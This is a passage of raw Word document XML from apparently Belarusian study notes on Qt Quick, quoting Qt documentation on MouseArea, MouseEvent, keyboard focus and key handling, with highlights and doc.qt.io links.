          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2223" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signals and handlers, and event system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.</w:t>
      </w:r>
      <w:r w:rsidR="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00B82406" w:rsidRPr="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu more about event propogation</w:t>
      </w:r>
      <w:r w:rsidR="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="00B82406" w:rsidRDefault="009210E8" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006420FB" w:rsidRPr="007945B6" w:rsidRDefault="006420FB" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1885" w:name="_Toc483000938"/>
      <w:bookmarkStart w:id="1886" w:name="_Toc483003929"/>
      <w:bookmarkStart w:id="1887" w:name="_Toc483604281"/>
      <w:bookmarkStart w:id="1888" w:name="_Toc483605501"/>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Тыпы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1885"/>
      <w:bookmarkEnd w:id="1886"/>
      <w:bookmarkEnd w:id="1887"/>
      <w:bookmarkEnd w:id="1888"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1162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7938"/>
        <w:gridCol w:w="1985"/>
      </w:tblGrid>
      <w:tr w:rsidR="006420FB" w:rsidRPr="00763692" w:rsidTr="0034282A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006420FB" w:rsidRPr="007945B6" w:rsidRDefault="006420FB" w:rsidP="0034282A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>Тып</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006420FB" w:rsidRPr="007945B6" w:rsidRDefault="006420FB" w:rsidP="0034282A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>апісанне</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006420FB" w:rsidRPr="007945B6" w:rsidRDefault="006420FB" w:rsidP="0034282A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006420FB" w:rsidRPr="002230B8" w:rsidTr="0034282A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006420FB" w:rsidRPr="006420FB" w:rsidRDefault="006420FB" w:rsidP="0034282A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MouseArea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006420FB" w:rsidRPr="006420FB" w:rsidRDefault="006420FB" w:rsidP="0034282A">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A </w:t>
            </w:r>
            <w:hyperlink r:id="rId2224" w:history="1">
              <w:r w:rsidRPr="006420FB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MouseArea</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is an </w:t>
            </w:r>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>invisible item</w:t>
            </w:r>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> that is typically used in conjunction with a visible item in order to provide </w:t>
            </w:r>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>mouse handling for that item</w:t>
            </w:r>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. By effectively acting as a </w:t>
            </w:r>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>proxy</w:t>
            </w:r>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, the </w:t>
            </w:r>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>logic for mouse handling can be contained within a </w:t>
            </w:r>
            <w:hyperlink r:id="rId2225" w:history="1">
              <w:r w:rsidRPr="006420FB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MouseArea</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> item</w:t>
            </w:r>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006420FB" w:rsidRPr="006420FB" w:rsidRDefault="00490E7E" w:rsidP="0034282A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2226" w:history="1">
              <w:r w:rsidR="006420FB" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-mousearea.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="006420FB">
              <w:rPr>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006420FB" w:rsidRPr="002230B8" w:rsidTr="0034282A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006420FB" w:rsidRPr="007945B6" w:rsidRDefault="006420FB" w:rsidP="0034282A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MouseEvent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006420FB" w:rsidRPr="006420FB" w:rsidRDefault="006420FB" w:rsidP="0034282A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidRPr="0034282A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>position of the mouse</w:t>
            </w:r>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> can be found via the </w:t>
            </w:r>
            <w:hyperlink r:id="rId2227" w:anchor="x-prop" w:history="1">
              <w:r w:rsidRPr="006420FB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>x</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> and </w:t>
            </w:r>
            <w:hyperlink r:id="rId2228" w:anchor="y-prop" w:history="1">
              <w:r w:rsidRPr="006420FB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>y</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> properties. The </w:t>
            </w:r>
            <w:r w:rsidRPr="0034282A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>button that caused the event</w:t>
            </w:r>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is available via the </w:t>
            </w:r>
            <w:hyperlink r:id="rId2229" w:anchor="button-prop" w:history="1">
              <w:r w:rsidRPr="006420FB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>button</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="006420FB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> property.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006420FB" w:rsidRPr="001330A1" w:rsidRDefault="00490E7E" w:rsidP="006420FB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2230" w:history="1">
              <w:r w:rsidR="006420FB" w:rsidRPr="006420FB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="006420FB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="006420FB" w:rsidRDefault="00CF3A01" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2231" w:history="1">
        <w:r w:rsidR="0034282A" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-input-focus.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1889" w:name="_Toc483000939"/>
      <w:bookmarkStart w:id="1890" w:name="_Toc483003930"/>
      <w:bookmarkStart w:id="1891" w:name="_Toc483604282"/>
      <w:bookmarkStart w:id="1892" w:name="_Toc483605502"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keyboard Focus in Qt Quick</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1889"/>
      <w:bookmarkEnd w:id="1890"/>
      <w:bookmarkEnd w:id="1891"/>
      <w:bookmarkEnd w:id="1892"/>
    </w:p>
    <w:p w:rsidR="00B82406" w:rsidRPr="009B5FE9" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When a key is pressed or released, a key event is generated and delivered to the focused Qt Quick</w:t>
      </w:r>
      <w:r w:rsidR="009B5FE9" w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2232" w:history="1">
        <w:r w:rsidRPr="009B5FE9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. To </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>facilitate the construction of reusable components</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and to </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>address some of the cases unique to fluid user interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the Qt Quick items </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add a scope based extension to Qt's traditional keyboard focus model</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1893" w:name="key-handling-overview"/>
      <w:bookmarkStart w:id="1894" w:name="_Toc483000940"/>
      <w:bookmarkStart w:id="1895" w:name="_Toc483003931"/>
      <w:bookmarkStart w:id="1896" w:name="_Toc483604283"/>
      <w:bookmarkStart w:id="1897" w:name="_Toc483605503"/>
      <w:bookmarkEnd w:id="1893"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Key Handling Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1894"/>
      <w:bookmarkEnd w:id="1895"/>
      <w:bookmarkEnd w:id="1896"/>
      <w:bookmarkEnd w:id="1897"/>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When the user presses or releases a key</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the following occurs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt receives the key action and generates a key event</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If a</w:t>
      </w:r>
      <w:r w:rsidR="000966E4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
